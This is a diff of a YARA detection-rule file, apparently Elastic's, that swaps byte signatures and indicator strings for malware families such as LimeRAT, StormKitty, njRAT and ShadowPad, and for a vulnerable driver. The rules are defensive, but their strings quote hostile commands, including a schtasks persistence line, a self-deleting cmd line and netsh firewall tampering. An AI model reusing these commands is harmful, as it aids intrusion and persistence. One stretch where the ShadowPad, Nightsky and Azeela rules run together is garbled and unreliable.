8D 74 24 2E 89 44 } + $a1 = { 93 F0 DA 07 E7 F0 DA 07 E0 5B 99 65 47 38 96 6C 75 91 65 46 5A D0 B0 25 DA 90 42 CE F1 73 10 B1 14 BD 3C EC FD 7C AF 9B 8D 86 89 A5 FF C0 3F 78 57 8E E2 AD 2E 3A 2F 74 79 B1 FE 27 69 6B 9F 97 CE C8 67 88 1A 0B 01 F1 B7 76 35 18 E8 FF E1 D7 66 8C 41 03 EB F8 64 E5 7E F1 06 73 AB BF 6B 1D 6A B9 B6 BA 41 A2 91 49 5E 85 51 A0 83 23 46 D6 E0 E5 0F C2 53 89 2A 35 94 AF FC 87 A0 D8 08 E7 B8 DB 08 E7 78 22 E5 7E AE BB EF 16 87 08 3C 47 F0 49 1E 0D 2D 9A 1B 55 54 05 14 69 A3 1B 9C 7A 97 7B CF 85 2B 09 F9 DC 2C EB A6 55 F1 A0 07 B4 AA 80 EA ED 26 87 C0 } condition: - all of them + any of them } -rule ELASTIC_Linux_Trojan_Snessik_E435A79C : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Blackmatter_8394F6D5 : FILE MEMORY { meta: - description = "Detects Linux Trojan Snessik (Linux.Trojan.Snessik)" + description = "Detects Windows Ransomware Blackmatter (Windows.Ransomware.Blackmatter)" author = "Elastic Security" - id = "e435a79c-4b8e-42de-8d78-51b684eba178" - date = "2021-01-12" - modified = "2021-09-16" + id = "8394f6d5-4761-4df6-974d-eaa0a25353da" + date = "2021-08-03" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Snessik.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e24749b07f824a4839b462ec4e086a4064b29069e7224c24564e2ad7028d5d60" - logic_hash = "4850530a0566844447f56f4e5cb43c5982b1dcb784bb1aef3e377525b8651ed3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Blackmatter.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "072158f5588440e6c94cb419ae06a27cf584afe3b0cb09c28eff0b4662c15486" + logic_hash = "50a9b65ca6dde4fc32d2d57e72042f4380dd6c263ec5c33ce7c158151b91a5ae" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bd9f81d03812e49323b86b2ea59bf5f08021d0b43f7629eb4d59e75eccb7dcf1" + fingerprint = "3825f59ffe9b2adc1f9dd175f4d57c9aa3dd6ff176616ecbe7c673b5b4d414f8" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C6 75 38 31 C0 48 8B 5C 24 68 48 8B 6C 24 70 4C 8B 64 24 78 4C 8B AC 24 80 00 } + $a1 = { FF E1 D7 66 8C 41 03 EB F8 64 E5 7E F1 06 73 AB BF 6B 1D 6A B9 B6 BA 41 A2 91 49 5E 85 51 A0 83 23 } condition: - all of them + any of them } -rule ELASTIC_Windows_Trojan_M0Yv_92F66467 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Rook_Ee21Fa67 : FILE MEMORY { meta: - description = "Detects Windows Trojan M0Yv (Windows.Trojan.M0yv)" + description = "Detects Windows Ransomware Rook (Windows.Ransomware.Rook)" author = "Elastic Security" - id = "92f66467-89fd-4501-b045-3c6aed6c82f9" - date = "2023-05-03" - modified = "2023-06-13" + id = "ee21fa67-bd82-40fb-9c6d-bab5abfe14b3" + date = "2022-01-14" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_M0yv.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0004d22dd18c0239b722c085101c0a32b967159e2066a0b7b9104bb43f5cdea0" - logic_hash = "a47b20679aee9559213de22783cfbc55c6091785e4dc288349963e863b78cf41" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Rook.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c2d46d256b8f9490c9599eea11ecef19fde7d4fdd2dea93604cee3cea8e172ac" + logic_hash = "6fe19cfc572a3dceba5e26615d111a3c0fa1036e275a5640a5c5a8f8cdaf6dc1" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "2afebc9478fbad18b74748794773cae9be3a4eac599d657bab5a7f8de331ba41" + fingerprint = "8ef731590e73f79a13d04db39e58b03d0a29fd8e46a0584b0fcaf57ac0efe473" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -89155,29 +89294,28 @@ rule ELASTIC_Windows_Trojan_M0Yv_92F66467 : FILE MEMORY os = "windows" strings: - $a1 = { 54 65 7D 41 69 6E 63 5D 6A 68 6D } - $a2 = { 4E 73 4D 62 62 77 61 6E 66 77 58 72 61 72 64 6C 7D } - $a3 = { 40 65 7D 41 69 6E 63 48 77 71 7A 69 66 74 75 67 7A 55 } + $a = { 01 75 09 8B C3 FF C3 48 89 74 C5 F0 48 FF C7 48 83 FF 1A 7C DB } condition: all of them } -rule ELASTIC_Windows_Trojan_Parallax_D72Ec0E2 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Limerat_24269A79 : FILE MEMORY { meta: - description = "Detects Windows Trojan Parallax (Windows.Trojan.Parallax)" + description = "Detects Windows Trojan Limerat (Windows.Trojan.Limerat)" author = "Elastic Security" - id = "d72ec0e2-cf33-4ed8-8d3f-66bc93e11f26" - date = "2022-09-05" - modified = "2022-09-29" - reference = "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Parallax.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "6c2c84624912f3b612ae435cf3e8000192a1b168b30205ed4a93b7fab7e336ad" + id = "24269a79-0172-4da5-9b4d-f61327072bf0" + date = "2021-08-17" + modified = "2021-10-04" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Limerat.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ec781a714d6bc6fac48d59890d9ae594ffd4dbc95710f2da1f1aa3d5b87b9e01" + logic_hash = "053a6abe589db23c4b9baed24729c8bcdd9019535fd0d9efc60ab4035c9779f3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "897117bf47d993f5cb360a0c65b1bb3df72b594334c896c1d5e7e858df202d49" + fingerprint = "cb714cd787519216d25edaad9f89a9c0ce1b8fbbbcdf90bda4c79f5d85fdf381" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -89185,30 +89323,28 @@ rule ELASTIC_Windows_Trojan_Parallax_D72Ec0E2 : FILE MEMORY os = "windows" strings: - $COM_png = { B9 01 00 00 00 6B D1 00 C6 44 15 D4 83 B8 01 00 00 00 C1 E0 00 C6 44 05 D4 B6 B9 01 00 00 00 D1 E1 C6 44 0D D4 33 BA 01 00 00 00 6B C2 03 C6 44 05 D4 28 B9 01 00 00 00 C1 E1 02 C6 44 0D D4 36 BA 01 00 00 00 6B C2 05 C6 44 05 D4 6B B9 01 00 00 00 6B D1 06 C6 44 15 D4 90 B8 01 00 00 00 6B C8 07 C6 44 0D D4 97 } - $png_parse = { 8B 4D ?? 8B 04 B8 85 C9 74 ?? 8B F1 90 8A 08 8D 40 ?? 88 0C 1A 42 83 EE ?? 75 ?? 8B 4D ?? 8B 45 ?? 47 3B 7D ?? 72 ?? } - $config_func = { C7 45 F8 68 74 74 70 8B ?? ?? 8B 02 89 ?? ?? 6A 08 8D ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 8B ?? ?? 52 8D ?? ?? 50 8B ?? ?? 8B 51 0C FF D2 } - $winnet_function = { B8 77 00 00 00 66 89 ?? ?? B9 69 00 00 00 66 89 ?? ?? BA 6E 00 00 00 66 89 ?? ?? B8 69 00 00 00 66 89 ?? ?? B9 6E 00 00 00 66 89 ?? ?? BA 65 00 00 00 66 89 ?? ?? B8 74 00 00 00 66 89 ?? ?? 33 C9 66 89 ?? ?? 8D ?? ?? 52 8B ?? ?? 8B 48 1C FF D1 } + $a1 = "schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr \"'" wide fullword condition: - $config_func or $winnet_function or $COM_png or $png_parse + all of them } -rule ELASTIC_Windows_Trojan_Parallax_B4Ea4F1A : FILE MEMORY +rule ELASTIC_Windows_Trojan_Stormkitty_6256031A : FILE MEMORY { meta: - description = "Detects Windows Trojan Parallax (Windows.Trojan.Parallax)" + description = "Detects Windows Trojan Stormkitty (Windows.Trojan.StormKitty)" author = "Elastic Security" - id = "b4ea4f1a-4b78-4bb8-878e-40fe753018e9" - date = "2022-09-08" - modified = "2022-09-29" - reference = "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Parallax.yar#L24-L55" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "731fe7bd339ec6b0372b4809004a21f53537bd82f084960b8d018f994dcdc06a" + id = "6256031a-e7dd-423b-a83f-4db428cb3d1b" + date = "2022-03-21" + modified = "2022-04-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_StormKitty.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0c69015f534d1da3770dbc14183474a643c4332de6a599278832abd2b15ba027" + logic_hash = "a797e87eaf5b173da9dd43fcff03b3d26198dcafa29c3f2ca369773c73001234" score = 75 - quality = 42 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "5c695f6b1bb0e72a070e076402cd94a77b178809617223b6caac6f6ec46f2ea1" + fingerprint = "6f0463de42c97701b0f3b8172e7e461501357921a3d11e6ca467bd1ca397d0b6" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -89216,42 +89352,33 @@ rule ELASTIC_Windows_Trojan_Parallax_B4Ea4F1A : FILE MEMORY os = "windows" strings: - $parallax_payload_strings_0 = "[Ctrl +" ascii wide fullword - $parallax_payload_strings_1 = "[Ctrl]" ascii wide fullword - $parallax_payload_strings_2 = "Clipboard Start" ascii wide fullword - $parallax_payload_strings_3 = "[Clipboard End]" ascii wide fullword - $parallax_payload_strings_4 = "UN.vbs" ascii wide fullword - $parallax_payload_strings_5 = "lt +" ascii wide fullword - $parallax_payload_strings_6 = "lt]" ascii wide fullword - $parallax_payload_strings_7 = ".DeleteFile(Wscript.ScriptFullName)" ascii wide fullword - $parallax_payload_strings_8 = ".DeleteFolder" ascii wide fullword - $parallax_payload_strings_9 = ".DeleteFile " ascii wide fullword - $parallax_payload_strings_10 = "Scripting.FileSystemObject" ascii wide fullword - $parallax_payload_strings_11 = "On Error Resume Next" ascii wide fullword - $parallax_payload_strings_12 = "= CreateObject" ascii wide fullword - $parallax_payload_strings_13 = ".FileExists" ascii wide fullword + $a1 = "https://github.com/LimerBoy/StormKitty" ascii fullword + $a2 = "127.0.0.1 www.malwarebytes.com" wide fullword + $a3 = "KillDefender" + $a4 = "Username: {1}" wide fullword + $a5 = "# End of Cookies" wide fullword + $a6 = "# End of Passwords" wide fullword condition: - 7 of ($parallax_payload_strings_*) + all of them } -rule ELASTIC_Windows_Trojan_Shadowpad_Be71209D : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bandook_38497690 : FILE MEMORY { meta: - description = "Target ShadowPad loader" + description = "Detects Windows Trojan Bandook (Windows.Trojan.Bandook)" author = "Elastic Security" - id = "be71209d-b1c0-4922-87ae-47d0930d8755" - date = "2023-01-31" - modified = "2023-02-01" - reference = "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_ShadowPad.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "452b08d6d2aa673fb6ccc4af6cebdcb12b5df8722f4d70d1c3491479e7b39c05" - logic_hash = "24e035bbcd5d44877e6e582a995d0035ad26c53e832c34b0c8a3836cb1a11637" + id = "38497690-6663-47c9-a864-0bbe6a3f7a8b" + date = "2022-08-10" + modified = "2022-09-29" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Bandook.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4d079586a51168aac708a9ab7d11a5a49dfe7a16d9ced852fbbc5884020c0c97" + logic_hash = "199614993f63636764808313f25199348afdf4d537c8dca06f673559e34636b8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "629f1502ce9f429ba6d497b8f2b0b35e57ca928a764ee6f3cb43521bfa6b5af4" - threat_name = "Windows.Trojan.ShadowPad" + fingerprint = "b6debea805a8952b9b7473ad7347645e4aced3ecde8d6e53fa2d82c35b285b3c" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -89259,121 +89386,125 @@ rule ELASTIC_Windows_Trojan_Shadowpad_Be71209D : FILE MEMORY os = "windows" strings: - $a1 = "{%8.8x-%4.4x-%4.4x-%8.8x%8.8x}" + $str1 = "%s~!%s~!%s~!%s~!%s~!%s~!" + $str2 = "ammyy.abc" + $str3 = "StealUSB" + $str4 = "DisableMouseCapture" + $str5 = "%sSkype\\%s\\config.xml" + $str6 = "AVE_MARIA" condition: - all of them + 3 of them } -rule ELASTIC_Windows_Trojan_Shadowpad_0D899241 : MEMORY +rule ELASTIC_Linux_Trojan_Azeela_Aad9D6Cc : FILE MEMORY { meta: - description = "Target ShadowPad payload" + description = "Detects Linux Trojan Azeela (Linux.Trojan.Azeela)" author = "Elastic Security" - id = "0d899241-6ef8-4524-a728-4ed53e4d2cec" - date = "2023-01-31" - modified = "2023-02-01" - reference = "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_ShadowPad.yar#L23-L48" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cb3a425565b854f7b892e6ebfb3734c92418c83cd590fc1ee9506bcf4d8e02ea" - logic_hash = "57385e149c6419aed2dcd3ecbbe26d8598918395a6480dd5cdb799ce7328901a" + id = "aad9d6cc-32ff-431a-9914-01c7adc80877" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Azeela.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6c476a7457ae07eca3d3d19eda6bb6b6b3fa61fa72722958b5a77caff899aaa6" + logic_hash = "efc8b5de42a2ee2104dc8e8c25b313f6ced2fb291ba27dc8276822960dd7eb74" score = 75 quality = 75 - tags = "MEMORY" - fingerprint = "7070eb3608c2c39804ccad4a05e4de12ec4eb47388589ef72c723b353b920a68" - threat_name = "Windows.Trojan.ShadowPad" + tags = "FILE, MEMORY" + fingerprint = "3b7c73a378157350344d52acd6c210d5924cf55081b386d0d60345e4c44c5921" severity = 100 arch_context = "x86" - scan_context = "memory" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "hH#whH#w" fullword - $a2 = "Yuv~YuvsYuvhYuv]YuvRYuvGYuv1:tv

NIGHT SKY
" ascii fullword - $a4 = "URL:https://contact.nightsky.cyou" ascii fullword + $a = { 10 8B 0F 83 EC 08 50 57 FF 51 54 83 C4 10 8B 8B DC FF FF FF 89 4C } condition: - 2 of them + all of them } -rule ELASTIC_Windows_Ransomware_Nightsky_253C4D0D : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Cleanlog_C2907D77 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Nightsky (Windows.Ransomware.Nightsky)" + description = "Detects Linux Hacktool Cleanlog (Linux.Hacktool.Cleanlog)" author = "Elastic Security" - id = "253c4d0d-157f-4929-9f0e-5830ebc377dc" - date = "2022-03-14" - modified = "2022-04-12" + id = "c2907d77-6ea9-493f-a7b3-4a0795da0a1d" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Nightsky.yar#L24-L42" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2c940a35025dd3847f7c954a282f65e9c2312d2ada28686f9d1dc73d1c500224" - logic_hash = "ba9e6dab664e464e0fdc65bd8bdccc661846d85e7fd8fbf089e72e9e5b71fb17" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Cleanlog.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "613ac236130ab1654f051d6f0661fa62414f3bef036ea4cc585b4b21a4bb9d2b" + logic_hash = "39b72973bbcddf14604b8ea08339657cba317c23fd4d69d4aa0903b262397988" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "739529dfb1f8c8ab2a7f6a4b2b18b27dd2fcc38eda0f110897fc6cb5d64b1c92" + fingerprint = "131c71086c30ab22ca16b3020470561fa3d32c7ece9a8faa399a733e8894da30" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 43 B8 48 2B D9 49 89 43 C0 4C 8B E2 49 89 43 C8 4C 8B F1 49 89 } + $a = { 89 E5 48 83 EC 10 89 7D FC 83 7D FC 00 7E 11 8B 45 FC BE 09 00 } condition: all of them } -rule ELASTIC_Windows_Ransomware_Mespinoza_3Adb59F5 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Cleanlog_3Eb725D1 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Mespinoza (Windows.Ransomware.Mespinoza)" + description = "Detects Linux Hacktool Cleanlog (Linux.Hacktool.Cleanlog)" author = "Elastic Security" - id = "3adb59f5-a4af-48f2-8029-874a62b23651" - date = "2021-08-05" - modified = "2021-10-04" + id = "3eb725d1-24de-427a-b6ed-3ca03c0716df" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Mespinoza.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6f3cd5f05ab4f404c78bab92f705c91d967b31a9b06017d910af312fa87ae3d6" - logic_hash = "28c8ad42a3af70fed274edc9105dae5cef13749d71510561a50428c822464934" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Cleanlog.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4df4ebcc61ab2cdb8e5112eeb4e2f29e4e841048de43d7426b1ec11afe175bf6" + logic_hash = "a9530aca53d935f3e77a5f0fc332db16e3a2832be67c067e5a6d18e7ec00e39f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f44a79048427e79d339d3b0ccaeb85ba6731d5548256a2615f32970dcf67578f" - severity = 90 + fingerprint = "54d3c59ba5ca16fbe99a4629f4fe7464d13f781985a7f35d05604165f9284483" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "Don't try to use backups because it were encrypted too." ascii fullword - $a2 = "Every byte on any types of your devices was encrypted." ascii fullword - $a3 = "n.pysa" wide fullword + $a = { 45 E0 83 45 C0 01 EB 11 83 45 DC 01 EB 0B 83 45 D8 01 EB 05 83 45 } condition: all of them } -rule ELASTIC_Windows_Trojan_Njrat_30F3C220 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Cleanlog_400B7595 : FILE MEMORY { meta: - description = "Detects Windows Trojan Njrat (Windows.Trojan.Njrat)" + description = "Detects Linux Hacktool Cleanlog (Linux.Hacktool.Cleanlog)" author = "Elastic Security" - id = "30f3c220-b8dc-45a1-bcf0-027c2f76fa63" - date = "2021-06-13" - modified = "2021-10-04" + id = "400b7595-c3c4-4999-b3b9-dcfe9b5df3f6" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Njrat.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b" - logic_hash = "76347165829415646f943bb984cd17ca138cf238d03f114c498dbcec081d5ae3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Cleanlog.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4df4ebcc61ab2cdb8e5112eeb4e2f29e4e841048de43d7426b1ec11afe175bf6" + logic_hash = "e36acf708875efda88143124e11fef5b0e2f99d17b0c49344db969cf0d454db1" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4" + fingerprint = "4423f1597b199046bfc87923e3e229520daa2da68c4c4a3ac69127ace518f19a" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "get_Registry" ascii fullword - $a2 = "SEE_MASK_NOZONECHECKS" wide fullword - $a3 = "Download ERROR" wide fullword - $a4 = "cmd.exe /c ping 0 -n 2 & del \"" wide fullword - $a5 = "netsh firewall delete allowedprogram \"" wide fullword - $a6 = "[+] System : " wide fullword + $a = { 72 20 65 6E 74 72 79 20 28 64 65 66 61 75 6C 74 3A 20 31 73 74 20 } condition: - 3 of them + all of them } -rule ELASTIC_Windows_Trojan_Njrat_Eb2698D2 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Mhyprot_26214176 : FILE { meta: - description = "Detects Windows Trojan Njrat (Windows.Trojan.Njrat)" + description = "Subject: miHoYo Co.,Ltd., Version: 1.0.0.0" author = "Elastic Security" - id = "eb2698d2-c9fa-4b0b-900f-1c4c149cca4b" - date = "2023-05-04" - modified = "2023-06-13" + id = "26214176-1565-4b10-bd7a-901206ef6b29" + date = "2022-08-25" + modified = "2022-08-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Njrat.yar#L26-L44" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d537397bc41f0a1cb964fa7be6658add5fe58d929ac91500fc7770c116d49608" - logic_hash = "c32a641f2d639f56a8137b3e0d0be3261fba30084eeba9d1205974713413af9f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Mhyprot.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6" + logic_hash = "61d1713c689b9d663f2d3360d07735b07ca10365b5ce424b2df726bd6cc434d3" score = 75 - quality = 73 - tags = "FILE, MEMORY" - fingerprint = "8eedcdabf459de87e895b142cd1a1b8c0e403ad8ec6466bc6ca493dd5daa823b" + quality = 75 + tags = "FILE" + fingerprint = "368c818c0052192c73f078a0ea314e3d2f5d08bc4ef32a27d7e01a40eba68940" + threat_name = "Windows.VulnDriver.Mhyprot" severity = 100 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a1 = { 24 65 66 65 39 65 61 64 63 2D 64 34 61 65 2D 34 62 39 65 2D 62 38 61 62 2D 37 65 34 37 66 38 64 62 36 61 63 39 } + $subject_name = { 06 03 55 04 03 [2] 6D 69 48 6F 59 6F 20 43 6F 2E 2C 4C 74 64 2E } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ + $str1 = "\\Device\\mhyprot2" wide fullword condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and int16 ( uint32(0x3C)+0x18)==0x020b and $subject_name and $version and $str1 } -rule ELASTIC_Macos_Trojan_Genieo_5E0F8980 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Sleepobfloader_460A1A75 : FILE MEMORY { meta: - description = "Detects Macos Trojan Genieo (MacOS.Trojan.Genieo)" + description = "Detects Windows Hacktool Sleepobfloader (Windows.Hacktool.SleepObfLoader)" author = "Elastic Security" - id = "5e0f8980-1789-4763-9e41-a521bdb3ff34" - date = "2021-10-05" - modified = "2021-10-25" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Genieo.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6c698bac178892dfe03624905256a7d9abe468121163d7507cade48cf2131170" - logic_hash = "76b725f6ae5755bb00d384ef2ae1511789487257d8bb7cb61b893226f03a803e" + id = "460a1a75-7242-41d6-8b39-51f2f0276a33" + date = "2024-01-24" + modified = "2024-01-29" + reference = "https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_SleepObfLoader.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "84b3bc58ec04ab272544d31f5e573c0dd7812b56df4fa445194e7466f280e16d" + logic_hash = "c0bc1b7ef71c1a91fc487f904315c6f187530ab39825f90f55ac36625d5b93cf" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f0b5198ce85d19889052a7e33fb7cf32a7725c4fdb384ffa7d60d209a7157092" + fingerprint = "8dbba5af9f379ac16a79b4989067b8715e084490ae2f048eb3a28d8d33c716e9" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a = { 00 CD 01 1E 68 57 58 D7 56 7C 62 C9 27 3C C6 15 A9 3D 01 02 2F E1 69 B5 4A 11 } + $a = { BA 01 00 00 00 41 B8 20 01 00 00 8B 48 3C 8B 4C 01 28 48 03 C8 48 89 0D ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? B9 01 00 00 00 } + $b = { 8A 50 20 